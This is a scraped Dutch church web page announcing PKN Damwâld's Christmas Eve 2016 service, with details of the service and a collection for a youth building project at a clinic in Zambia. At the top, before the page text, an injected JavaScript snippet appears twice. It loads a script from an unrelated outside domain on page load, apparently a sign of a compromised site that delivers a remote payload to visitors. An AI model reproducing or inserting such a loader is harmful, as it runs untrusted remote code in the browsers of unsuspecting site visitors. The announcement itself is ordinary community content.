;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerstnachtdienst - PKN Damwâld
zaterdag 24 december 2016
22:00 uur
De kerk is open vanaf 21.00 uur, de chocolademelk staat klaar !

Kerstnachtdienst

Thema: de Wei is iepen

vg_-01

Informatie

Voorganger:S. Boukes
Organist:m.m.v. gospelduo Promise en blazers van brassband Ere zij God
Thema:de Wei is iepen
Mededeling:De kerk is open vanaf 21.00 uur, de chocolademelk staat klaar !
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: World Servants Damwâld

n de zomervakantie van 2017 gaan wij met elf jongeren werken aan een project van World Servants.
Het centrale idee achter de werkwijze van World Servants is: ‘bouwen aan jezelf door te bouwen voor een ander’. Door deel te nemen aan een bouwproject van World Servants, help je mee de leefomstandigheden van de gemeenschap te verbeteren. Daarnaast bouw je aan jezelf omdat je kennismaakt met andere leefomstandigheden, met een andere cultuur en met een vaak andere geloofsbeleving.
Het project dat wij voor 2017 hebben uitgezocht betreft de uitbreiding van een kliniek in Nambo, Zambia. Op dit moment is er een basis kliniek in Nambo welke in 2011 is gebouwd door een World Servants groep. Het aantal bezoekers van de kliniek is tussen 2011 en nu gestegen van 11 naar 60 bezoekers per dag. Om de kwaliteit van de gezondheidszorg op peil te houden, wordt de kliniek uitgebreid.
Op dit moment wordt één van de lerarenwoningen van de school gebruikt door het personeel van de kliniek. Deze is echter bestemd voor een gediplomeerde leraar en hierdoor wordt het tekort aan huisvesting nog groter.
Door mee te bouwen aan de kliniek en de woning voor het personeel verbeterd de toegang tot en de kwaliteit van gezondheidszorg in Nambo. Door het uitbreiden van de kliniek kunnen bijvoorbeeld bevallingen beter begeleid worden en kan er vanuit de kliniek ook voorlichting worden gegeven over onder andere HIV/Aids.
Naast de collecte die tijdens de kerstnachtdienst voor ons gehouden zal worden, hebben we de afgelopen tijd diverse acties gehad. Zo hebben we kerstkaarten bezorgd en hebben we een gezellige bingo gehad in Nij Tjaerda. Ook hebben we op de kerstmarkt in Buitenpost gestaan en hebben we lekkere warme broodjes verkocht in ’t Honk. In januari en februari gaan we weer verder met onze acties dan zullen we bijvoorbeeld stamppot buffetten gaan organiseren.

wsdamwoude.nl

Tweede collecte: Bestrijding onkosten
Uitganscollecte: Onderhoud en inventaris